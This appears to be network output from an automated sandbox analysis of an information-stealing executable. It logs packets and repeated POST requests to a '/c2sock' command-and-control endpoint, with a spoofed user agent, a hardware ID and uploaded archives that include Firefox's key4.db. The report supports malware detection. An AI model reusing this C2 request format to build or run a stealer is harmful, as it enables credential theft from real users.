Nov 13, 2024 10:55:32.779860020 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:32.779956102 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:32.831512928 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:32.831568956 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:32.877703905 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:32.877912045 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:32.925664902 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:32.925895929 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:32.973731995 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:32.973881006 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:33.025834084 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:33.025959015 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:33.073640108 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:33.073723078 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:33.125726938 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:33.125866890 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:33.177659988 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:33.177864075 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:33.229772091 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:33.229834080 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:33.277539015 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:33.277640104 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:33.325716019 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:33.325840950 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:33.377692938 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:33.377839088 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:33.425700903 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:33.425802946 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:33.473565102 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:33.473683119 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:33.521584034 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:33.521688938 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:33.569468021 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:33.569538116 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:33.617480040 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:33.617558002 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:33.665680885 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:33.665783882 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:33.713581085 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:33.713772058 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:33.765682936 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:33.765811920 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:33.813715935 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:33.813889980 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:33.853785992 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:34.148191929 CET	49982	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:34.153811932 CET	80	49982	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:34.153888941 CET	49982	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:34.154098034 CET	49982	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:34.154546976 CET	49982	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:34.160749912 CET	80	49982	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:34.160764933 CET	80	49982	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:42.661518097 CET	80	49982	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:42.661653042 CET	49982	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:42.661700964 CET	49982	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:42.666802883 CET	80	49982	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:42.933877945 CET	49983	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:42.941041946 CET	80	49983	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:42.941149950 CET	49983	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:42.941271067 CET	49983	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:42.941651106 CET	49983	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:42.949356079 CET	80	49983	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:42.949537039 CET	80	49983	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:51.436189890 CET	80	49983	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:51.436285019 CET	49983	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:51.446734905 CET	49983	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:51.451777935 CET	80	49983	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:52.083756924 CET	49984	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:52.091015100 CET	80	49984	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:52.091130972 CET	49984	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:52.091308117 CET	49984	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:52.091700077 CET	49984	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:52.099524975 CET	80	49984	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:52.099960089 CET	80	49984	94.158.244.69	192.168.2.10
Nov 13, 2024 10:56:00.595141888 CET	80	49984	94.158.244.69	192.168.2.10
Nov 13, 2024 10:56:00.595324039 CET	49984	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:56:00.595391989 CET	49984	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:56:00.600456953 CET	80	49984	94.158.244.69	192.168.2.10
Nov 13, 2024 10:56:00.870543957 CET	49985	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:56:00.877461910 CET	80	49985	94.158.244.69	192.168.2.10
Nov 13, 2024 10:56:00.877629042 CET	49985	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:56:00.877804995 CET	49985	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:56:00.878206968 CET	49985	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:56:00.883586884 CET	80	49985	94.158.244.69	192.168.2.10
Nov 13, 2024 10:56:00.883939028 CET	80	49985	94.158.244.69	192.168.2.10
Nov 13, 2024 10:56:09.360930920 CET	80	49985	94.158.244.69	192.168.2.10
Nov 13, 2024 10:56:09.361496925 CET	49985	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:56:09.361496925 CET	49985	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:56:09.366497040 CET	80	49985	94.158.244.69	192.168.2.10
Nov 13, 2024 10:56:09.627111912 CET	49986	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:56:09.633503914 CET	80	49986	94.158.244.69	192.168.2.10
Nov 13, 2024 10:56:09.633634090 CET	49986	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:56:09.633724928 CET	49986	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:56:09.634155989 CET	49986	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:56:09.641968966 CET	80	49986	94.158.244.69	192.168.2.10
Nov 13, 2024 10:56:09.642447948 CET	80	49986	94.158.244.69	192.168.2.10
Nov 13, 2024 10:56:18.125536919 CET	80	49986	94.158.244.69	192.168.2.10
Nov 13, 2024 10:56:18.125633955 CET	49986	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:56:18.125732899 CET	49986	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:56:18.130495071 CET	80	49986	94.158.244.69	192.168.2.10
Nov 13, 2024 10:56:18.426907063 CET	49987	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:56:18.432296991 CET	80	49987	94.158.244.69	192.168.2.10
Nov 13, 2024 10:56:18.432435989 CET	49987	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:56:18.432607889 CET	49987	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:56:18.433078051 CET	49987	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:56:18.438229084 CET	80	49987	94.158.244.69	192.168.2.10
Nov 13, 2024 10:56:18.438643932 CET	80	49987	94.158.244.69	192.168.2.10
Nov 13, 2024 10:56:26.916234016 CET	80	49987	94.158.244.69	192.168.2.10
Nov 13, 2024 10:56:26.916301966 CET	49987	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:56:26.916368961 CET	49987	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:56:26.921273947 CET	80	49987	94.158.244.69	192.168.2.10

HTTP Request Dependency Graph

94.158.244.69

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49799	94.158.244.69	80	7276	C:\Users\user\Desktop\I5jG2Os8GA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:54:21.687001944 CET	190	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 16798 Host: 94.158.244.69
Nov 13, 2024 10:54:21.691559076 CET	11124	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data;
Nov 13, 2024 10:54:21.691967010 CET	1236	OUT	Data Raw: 4a 12 0d 77 51 a5 18 7e fa 16 9b b0 be 2f fc 1f 69 3d 38 23 4a b3 b3 99 83 62 c4 58 54 bc e5 3a 98 95 e2 43 cf c5 1a 92 51 19 79 8c 99 04 a4 16 6d da ee bc 66 33 6b 88 2f ce 7c 7e 3f 3c eb f9 13 b9 bf 0d 89 18 84 dd 34 23 49 14 0a ad ed 6f 8b d2 Data Ascii: JwQ~/i=8#JbXT:CQymf3k/\|~?<4#Io\gj>7;,)emVW^*\|(MLd^1EsDHi)8;@IAMQhpZS`hA4SjuF-~~
Nov 13, 2024 10:54:21.696624041 CET	2472	OUT	Data Raw: 90 3e b0 ff 07 00 00 00 d2 07 f6 ff 00 00 00 40 fa c0 fe 1f 00 00 00 48 1f 58 ff 01 00 00 80 f4 81 f5 1f 00 00 00 48 1f f8 fd 1f 00 00 00 48 1f f9 81 b7 84 5c 56 13 c4 bf cb fd 77 6e 21 ab f5 ff c5 40 4d 00 00 7c 53 1c cc 7f 28 4a 4f 9e 64 5e 6c Data Ascii: >@HXHH\Vwn!@M\|S(JOd^lzJmQjs>FZuj)"MO<&kw Juyayu4"&5,Ii4up1i(Iz.KqR~aJNIUZ)L*k{dKQLlW')ZXN
Nov 13, 2024 10:54:21.696727037 CET	1966	OUT	Data Raw: 7f 7d c9 3c 7b 3b 7a 7a cc 30 d0 54 5c b8 ad f9 ba f0 d7 64 e1 d7 cf 10 ce f9 b9 a1 9f 9b a9 79 df c0 14 f1 e2 f0 a1 1b 9a d6 f3 d1 13 96 8f 0f 1f d8 5a f6 e5 c9 3b 03 37 8f b5 de 6b 98 1d 5f 7a 5d 77 bb 60 df cd de 9d a6 1f 3f ac b2 5e 98 bb bb Data Ascii: }<{;zz0T\dyZ;7k_z]w`?^t3sc"hcN#+V;x+b95<\[-Wsv`#Tl0KEE6Ybm`mn?Cv}yw/\|0qzV5w

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49854	94.158.244.69	80	7276	C:\Users\user\Desktop\I5jG2Os8GA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:54:31.163049936 CET	190	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 19006 Host: 94.158.244.69
Nov 13, 2024 10:54:31.163846016 CET	11124	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data;
Nov 13, 2024 10:54:31.168071032 CET	1236	OUT	Data Raw: 1f 7e 1c 75 6d 68 cc 3d 9b f4 82 22 c1 20 b1 89 9b 06 bb b4 28 32 49 a1 bb d2 18 0a e4 ee 94 1c 65 42 43 30 1a 77 be e6 db 83 f5 b3 5c eb fc f9 ea be 35 1c 6f 68 bc 0b a9 26 cc d0 3c db dd 75 0f 05 ac e6 47 99 d9 68 e8 2c b9 d3 8d 0a fa cd c4 b2 Data Ascii: ~umh=" (2IeBC0w\5oh&<uGh,G{=C?<2At{i_ruG:LB^Xq-A6u>$~NB9&F\(n}v;iqQT2Xk]P%SEXIbJ!b2eQ?>(G
Nov 13, 2024 10:54:31.168920040 CET	2472	OUT	Data Raw: 92 20 3c b8 60 76 00 0d 13 f8 c1 11 6e 9c a3 18 b4 1d 8e 8b 7b 10 73 f6 6c e6 e1 79 e8 55 f5 28 3f d0 47 b5 75 fb 8e da 68 6d 5f 2e 6b 22 e6 ea 3a 48 a1 ad 63 2f 99 ed bb e5 71 6f 3c 36 14 ae 75 f9 f2 81 17 e3 72 c9 f2 18 2b d7 94 e5 72 73 1b 35 Data Ascii: <`vn{slyU(?Guhm_.k":Hc/qo<6ur+rs5%XQ/Y_bEe0'e"iC\G;`Y~HR:3-/lcird.\R[#$G AY<p Ad? ,GAt0J
Nov 13, 2024 10:54:31.168946028 CET	4174	OUT	Data Raw: 69 82 ea 5a aa 60 ca c4 11 2c 53 32 88 e8 c8 ba e7 bb db 9e eb ed 85 e7 82 30 a5 31 71 d3 60 97 3a 71 b4 43 e3 e4 9c 1b 75 2b fb 95 eb 93 08 fe ca 30 86 17 f8 6b 57 d7 ae de db f8 da ad 87 24 a6 b2 b8 2a 49 ba a5 6b a2 a4 4a 4a ef a9 e6 96 d5 ac Data Ascii: iZ`,S201q`:qCu+0kW$*IkJJYS,/%Uj\oqDQkY`.HCWQBz%!C_PVuRUTk}e-pwc&4Q$(;,5t\|]0%DEWdU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49905	94.158.244.69	80	7276	C:\Users\user\Desktop\I5jG2Os8GA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:54:40.271759987 CET	188	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 440 Host: 94.158.244.69
Nov 13, 2024 10:54:40.272409916 CET	440	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49951	94.158.244.69	80	7276	C:\Users\user\Desktop\I5jG2Os8GA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:54:49.314127922 CET	188	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 440 Host: 94.158.244.69
Nov 13, 2024 10:54:49.314604998 CET	440	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49978	94.158.244.69	80	7276	C:\Users\user\Desktop\I5jG2Os8GA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:54:58.286600113 CET	188	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 440 Host: 94.158.244.69
Nov 13, 2024 10:54:58.286981106 CET	440	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49979	94.158.244.69	80	7276	C:\Users\user\Desktop\I5jG2Os8GA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:55:07.287374973 CET	190	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 20371 Host: 94.158.244.69
Nov 13, 2024 10:55:07.287792921 CET	11124	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"3--SqDe87817huf871793q74Content-Disposition: form-data;
Nov 13, 2024 10:55:07.292486906 CET	1236	OUT	Data Raw: 2e 1f 79 e7 0d a0 e3 1e d6 6c 65 78 f8 b1 77 64 86 4e 6c 5f ef 6c eb 1c 59 eb 44 eb 4c b9 63 21 75 5b 76 68 ff ce ce fd 63 31 eb 42 29 5a e6 d6 f6 d8 3d eb f6 35 17 72 8f 9a ed 8b 79 45 76 7e 4b f3 b5 59 6a 78 21 75 eb fa a3 98 aa 56 66 bb 67 dd Data Ascii: .ylexwdNl_lYDLc!u[vhc1B)Z=5ryEv~KYjx!uVfgvQ,18^%;txgB+jN:CYYxs~nn~z#5gkBII_YuApnc'}?8W}t~o0;sg>@$-\|iyV>hj+6ZQ
Nov 13, 2024 10:55:07.292725086 CET	2472	OUT	Data Raw: 4c db 3e 59 ac 9d ab 57 e6 ee 8b b3 6a 95 46 75 a2 f8 e8 99 4a e5 dc 6c a1 7a ae b6 bd 5e a9 cc 9c 29 54 9b 99 13 85 d9 b9 42 69 ba fc 68 b9 78 71 7b a3 56 ac d6 5a c9 95 72 bd 58 ae 3f ba 7d 7a a6 72 a6 30 b3 fa 30 8e ef 39 30 33 52 7b f0 b9 e2 Data Ascii: L>YWjFuJlz^)TBihxq{VZrX?}zr00903R{SgSw'3zqN>W>[npivr[o?<`d4-:Z<wfDVy8rm{<cpZM}K7Y*
Nov 13, 2024 10:55:07.292793989 CET	2472	OUT	Data Raw: fe 46 f8 af c2 7f 1c fe 62 18 86 d5 28 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe 5f d9 90 ca 24 82 4c e6 f5 db 2e 3d 1e 6c 58 8a 5c 7c e3 73 37 75 46 06 3a 23 b9 ce 48 7f 67 24 bb 14 b9 f0 Data Ascii: Fb(_$L.=lX\\|s7uF:#Hg$GYj_g$IuF72vd ^;/wgW_?Yc*/=qhC02~Pc'WN?}q{KS('<
Nov 13, 2024 10:55:07.292809963 CET	2472	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 10:55:07.292850018 CET	595	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: PKK)PPK&mY&0Mozilla Firefox/091tobv5.default-release/key4.dbPK
Nov 13, 2024 10:55:07.319921970 CET	1236	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49980	94.158.244.69	80	7276	C:\Users\user\Desktop\I5jG2Os8GA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:55:16.232650995 CET	189	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 1135 Host: 94.158.244.69
Nov 13, 2024 10:55:16.233179092 CET	1135	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49981	94.158.244.69	80	7276	C:\Users\user\Desktop\I5jG2Os8GA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:55:25.363781929 CET	191	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 612692 Host: 94.158.244.69
Nov 13, 2024 10:55:25.364300966 CET	11124	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;
Nov 13, 2024 10:55:25.368814945 CET	1236	OUT	Data Raw: bb de 32 cd f8 5f a5 60 9d a0 cd 01 f3 d6 f9 35 ea 7f f9 93 e8 65 a9 e7 57 a3 fd bd 86 07 9a d6 17 9e 6b a9 dd 1b 61 f3 b3 c2 de 57 4d 79 6f bb a6 da 44 8f 71 70 df e1 96 7e e2 a0 0e 50 ce fb d5 fd bf c6 fc 8f f7 ff 59 69 2a 0b ae 6d 6d 16 fe b3 Data Ascii: 2_`5eWkaWMyoDqp~PYi*mm<>k\.>WU;dv{kO55)s4rEsyK;jb[q$]Xi,TcyJ$}Ey2T+sV-rf-5/Q-W9+/Z
Nov 13, 2024 10:55:25.369503975 CET	2472	OUT	Data Raw: da f0 82 48 e3 83 fd d1 ff 6c 36 18 ba e0 76 83 52 43 ef b3 ed a3 ff c9 24 d9 9f b9 2f 77 fd df e8 21 61 bd 9f b4 bf 30 c2 fd cc 68 03 0c cc 8f de 37 65 eb 21 fa 15 d1 36 88 fd 38 0e e3 13 e1 7e 33 3c 3e 11 f5 84 88 61 7f a6 ff 99 f6 67 3a 20 0c Data Ascii: Hl6vRC$/w!a0h7e!68~3<>ag: ~2p>FJ~A}:mu?!uu[3<x2YJ~fKzcBiE:k]_9s_iE:IIy
Nov 13, 2024 10:55:25.369528055 CET	2472	OUT	Data Raw: 3e 5f d6 ef d1 ff e0 7b dc 4f eb a3 ef e1 75 ca e6 c3 43 ff 93 66 48 f3 a3 01 d2 ff e0 78 b2 0f 58 9a a0 6d 9f ac 0d 34 fd 0f fb f4 79 41 4d 1f eb fa a4 e1 e1 98 d9 ef 2b fd ce ec ff 85 e7 99 73 7e b9 3e a0 5c 03 50 a6 97 ac af 93 fe 47 03 34 6b Data Ascii: >_{OuCfHxXm4yAM+s~>\PG4k,nw<9s?9s?_Uk/{,I[bA\|Lf= ^a\|f\&6Mby~8\3-{O crC
Nov 13, 2024 10:55:25.369641066 CET	2472	OUT	Data Raw: 4b 03 7e 57 e4 7b 39 ff eb 5d ff 73 fd bf ce ff fa 7b ff 6f b7 f8 9f cd 01 db e5 7f 11 fb eb 31 ff 73 fd bf ce ff 7a c1 ff 10 e7 7f e5 f6 ff 3a ff 73 fd bf 9d f2 3f 5b dd 5f 27 fd 2f ad 1f 38 6e 80 83 62 b6 47 fb cb e3 7f 66 fd 5f 6c f6 87 e1 7a Data Ascii: K~W{9]s{o1sz:s?[_'/8nbGf_lzI'i<n!4@s>p==D lqJVhk'9CkqnQUG3m\|gWIKyGsAzc3N`_)W\|Au
Nov 13, 2024 10:55:25.369656086 CET	2472	OUT	Data Raw: ed fd db e7 d2 64 03 7c d9 fb 37 f7 e3 de bf a9 66 8c f3 83 f7 d8 87 63 b3 ff 56 37 2c fa 15 93 77 1f 83 7b bd 2b ee 69 86 4e 86 dc 3e ce 0f ef c7 fd 32 d8 ff b8 f7 6c 2f 7b cf f6 ae f1 59 af 0f ee 21 bd 8d cf 29 9f d5 f6 cc 59 fe 97 f4 f3 92 fb Data Ascii: d\|7fcV7,w{+iN>2l/{Y!)Y.;^z??wx0<}gyn~x}86J's\z.r_%^ss?`.p%9QlDZE,p Ro
